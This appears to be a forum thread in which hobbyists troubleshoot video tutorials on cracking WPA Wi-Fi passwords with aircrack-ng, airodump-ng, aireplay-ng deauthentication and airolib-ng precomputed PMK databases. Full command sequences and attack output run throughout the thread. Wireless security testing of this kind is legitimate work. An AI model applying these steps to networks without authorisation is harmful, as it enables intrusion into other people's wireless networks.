Would just like to give a big thanks to Xploitz, B_P & Purehate for the video tutorials and contributions.
With some help from google along the way I have managed to follow all your tutorials and I am a complete Linux noob (only just got the eee which is what ive been playing on).
One thing that stumped me for a minute was creating the database, before realising I needed the "--" before each command. I found airolib did not recognise the "init" command even with the "--init", but jumping to the next step and importing the ssidlist.txt, airodump automatically assumes you wanted to create a new DB to put it in and thus created it.
I also found it didn't like the "ascii" you would state after the "--import" command. Neglecting to include "ascii" seemed to resolve this.
I am presuming these problems have arose as the software has advanced some since the date this video was created.
Im inspired to learn more thanks to you people and I have gone and bought some heavy reading.
A couple of questions I have though:
- Once you have the WPA handshake saved you no longer have to be connected to the AP? So I could thus save this file and compile the DB on a more powerful PC elsewhere - My eee is a little restrained in that department.
- Is there a way to roughly approximate the size of the DB knowing how many SSID's are being used and the size of the original wordlist? E.g If i only had 1 SSID and a 1MB word dictionary, what would the size of the batched db be?
Correct.Originally Posted by O-Jay
For each specified ESSID there will be computed a hash for each word present in the wordlist. Using only one ESSID the size of the database will not be much bigger, but for each added ESSID it will double in size. Using three ESSIDs instead of one would therefore result in a three times larger database.
-Monkeys are like nature's humans.
Airolib
My BT3F is installed in Vmware 6.5 (latest version), with fresh installation, i download every single software that is needed for wireless cracking with WUSB54GC :
1. rt73-k2wrlz-3.0.1.tar.bz2
2. kernel.lzm
3. wpa_supplicant-0.5.10.tar.gz
4. cowpatty-4.3.rar
5. sqlite-3.4.0.lzm (i know this is not the latest version)
6. wordlists-20031009.zip (for my dictionary)
7. aircrack-ng-1.0-rc1.tar.gz
All these files is on /root.
How do i start?
Open konsole,
bt ~ # tar -xvjf rt73-k2wrlz-3.0.1.tar.bz2
bt ~ # lzm2dir kernel.lzm /
bt ~ # cd rt73-k2wrlz-3.0.1/Module
bt Module # make
bt Module # make install
Then i plug-in the WUSB54GC, on the same konsole, cont.,
bt Module # cd
bt ~ # ifconfig -a
Yes, i saw rausb0 is connected, cont.,
bt ~ # modprobe rt73
Now, i try to get WPA Handshake, cont.,
bt ~ # ifconfig rausb0 up
bt ~ # iwconfig rausb0 mode monitor rate 1M
bt ~ # iwconfig
Yes, i saw rausb0 with bit rate=1Mb/s, cont.,
bt ~ # iwpriv forceprism 1
forceprism no private ioctls
bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0 rfmontx 1
bt ~ # airodump-ng rausb0
Thats odd, i got WPA handshake straight away without hv to do aireplay-ng 0 -5 -a xx:xx:xx:xx:xx:xx rausb0, then CTRL+C, cont.,
On new konsole,
bt ~ # airodump-ng -c 11 -w /tmp/dmp rausb0
Again, i got WPA handshake without the help with aireplay-ng 0 -5 -a xx:xx:xx:xx:xx:xx rausb0, so i press CTRL+C, cont.,
bt ~ # aircrack-ng -w mangled.lst -b xx:xx:xx:xx:xx:xx /tmp/dmp-01.cap
Output,
Aircrack-ng 1.0 rc1 r1085
[00:04:57] 44.. keys tested (146.53k/s)
Current passphrase: ....
Master Key...so on..
Ok, i got it running smoothly, CTRL+C then, question part...
1. I dont even install wpa_supplicant-0.5.10.tar.gz but i got the handshake, why?
2. I dont even do aireplay-ng 0 -5 -a xx:xx:xx:xx:xx:xx rausb0 but i got the handshake, why?
So i cont, on new konsole,
bt ~ # lzm2dir sqlite-3.4.0.lzm /
bt ~ # tar -xzvf aircrack-ng-1.0-rc1.tar.gz
bt ~ # cd aircrack-ng-1.0-rc1
bt aircrack-ng-1.0-rc1 # gmake SQLITE=true
bt aircrack-ng-1.0-rc1 # gmake SQLITE=true install
bt aircrack-ng-1.0-rc1 # aircrack-ng
Yes, i saw options -r <DB>, cont.,
bt aircrack-ng-1.0-rc1 # cd
bt ~ # airolib-ng testdb init
Up until here, it happen this way, output,
Airolib-ng 1.0 rc1 - (C) 2007 ebfe
Usage: airolib-ng <database> <operation> [option]
Operation:
--stats : bla blaa
--sql <sql> : bla blaa
...so on to all kind operation she has.
bt ~ #
I did not see any testdb file on my /root, why?
Cont. Airolib-ng
Hello everyone,
As for yesterday post, i got something weird going on here, but i need ur suggestion on this, I got WPA handshake, and now i try to use Airolib-ng with Aircrack-ng.
bt ~ # airolib-ng testdb -init
Database <testdb> does not already exist, creating it...
Database <testdb> sucessfully created
***If u put,
airolib-ng testdb init
Output; -blank-
airolib-ng testdb --init
Output; airolib-ng: unrecognized option `--init'
Cont.,
bt ~ # airolib-ng testdb --import essid /root/ssidlist
Reading file...
Writing...
Done.
***If u put,
airolib-ng testdb import ascii essid ssidlist.txt
airolib-ng testdb import ascii essid /root/ssidlist.txt
airolib-ng testdb import essid ssidlist.txt
airolib-ng testdb --import ascii essid ssidlist.txt
airolib-ng testdb --import essid ssidlist.txt
airolib-ng testdb --import essid /root/ssidlist.txt
Output ; Could not open file/stream for reading.
Cont.,
bt ~ # airolib-ng testdb --import passwd /root/mangled.lst
3Reading file...
Writing...ines read, 7028658 invalid lines ignored.
Done.
bt ~ # airolib-ng testdb --clean all
Deleting invalid ESSIDs and password...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
SQL error, disk I/O error <-------------------------------omgomg
Checking database integrity...
intergrity_check
I wait for 6 hours but no change even after i get home from class...so CTRL+C, anyway, cont. to next step,
bt ~ # airolib-ng testdb --verify all
Checking all PMKs. This could take a while...
ESSID PASSWORD PMK_DB CORRECT
bt ~ # aircrack-ng -r testdb /tmp/dmp-01.cap
Opening /tmp/dmp-01.cap
Read 3772 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx: home WPA (1 handshake)
Choosing first network as target.
Opening /tmp/dmp-01.cap
Aircrack-ng 1.0 rc1
Quitting aircrack-ng...
bt ~ #
Nothing happen here, not even calculating...
This might look a bit different compared to Xploitz video, as for now i assume this is a matter of program version or something else. Oh ya, i forgot the airolib-ng testdb --batch...^_^...but this does not change the main question, what happen on "SQL error, disk I/O error"? BTW, i appreciate if someone could help on this...
Others, how much packet i have to capture for WPA cracking to be effective ?
p/s : Hey Xploitz, nice and productive video u got, i'll try to adapt it to any ver. of aircrack or airolib. Thx alot man...
All you need is the complete 4-way Handshake. That can be within the first 10 packets, or in the 324567589 packet.Others, how much packet i have to capture for WPA cracking to be effective ?
Make a smaller database (ssidlist , paswdlist) and make sure you only have one word per line and there are no escape chars , or a "." or ","."SQL error, disk I/O error"
Try again and response your result.
Sidenote: Please do not show all commands that do not run...even when the syntax is false.
Be sensitive in choosing where you ask your question. You are likely to be ignored, or written off as a loser, if you:
* post your question to a forum where it's off topic
* post a very elementary question to a forum where advanced technical questions are expected, or vice-versa
* cross-post to too many different newsgroups
* post a personal e-mail to somebody who is neither an acquaintance of yours nor personally responsible for solving your problem
Could Someone pls post the command for removing essid's from the DataBase i have been searching for hours.
thanks
*edit*
post wrong section.
sorry.
is the clean/verify stage necessary?
Having now "pw-inspector-ed" my wordlist into a slightly smaller list of valid 8-63 char words... i would like to know if the "airolib-ng <dbname> --clean all" stage is really necessary.
Whenever I try it, i am frustrated by an SQL I/O Error, that crashes the process; causing me to start again.
So my question is... do i HAVE to perform the 'clean all' and/or 'verify' stage? or is it not a mandatory step in the process.
Thanks
**Edit: Also, does anyone have any calculations/ratios for the 'salted' database? e.g. if i have a 5GB wordlist, and i salt that against TWO ssids... is it simply a case of 5GB * 2 ssids = 10GB hashtable? (roughly). I ran out of hard disk space on my last BT4 installation when i tried to salt/manipulate a WPA hashtable. **
**Second Edit: This is not made clear in other posts, and it is something that caused me confusion before i reliased what is going on.
at the penultimate step you must use the command airolib-ng testdb --batch to begine the computation of all your PMKs. In this part you can see
Computed 500000 PMK in 3140 seconds (159 PMK/s, 15000 in buffer)
Eventually this will reach "0 in buffer". And you could be forgiven for thinking it had finished. however the process has NOT COMPLETED. After a few more seconds, the Number of PMKs in the buffer will go back UP to 250000, and the buffer will begin counting down again.
You must wait for it to complete its total computation, not just the first batch of 250000. If you can;t wait that long, you could try reading the tutorial on the use of Pyrit and CUDA and GPU processing power. http://forums.remote-exploit.org/showthread.php?t=20095
in the batch process :"using dictionary 40 MB !!!"
i open two konsole
1st knsole type the command of the batch and wait for time "5 to 10 minutes" and give me :
===========================================
root@bt:~# airolib-ng crack.db --batch
Computed 75000 PMK in 350 seconds (214 PMK/s, 175000 in buffer)
===========================================
2nd konsole : i type the command of the status but found that
===============================================
There are 2 ESSIDs and 1192087 passwords in the database. 2 out of 2384174 possible combinations have been computed (8.38865e-05%).
ESSID Priority Done
XX 64 0.0
XXXX 64 0.0
================================================== =
the process is very slow "
And my laptop is high performance !!
the compute process took alot of time in small dictionary so what can i do whn use your 3 GB dictionares in your thread !!!
[CENTER][COLOR="Red"] :: iF YOu hAvE nO iDeA aBoUt mE, pReSS F1 fOr hElP :D :: [/COLOR][/CENTER]
Posting Permissions
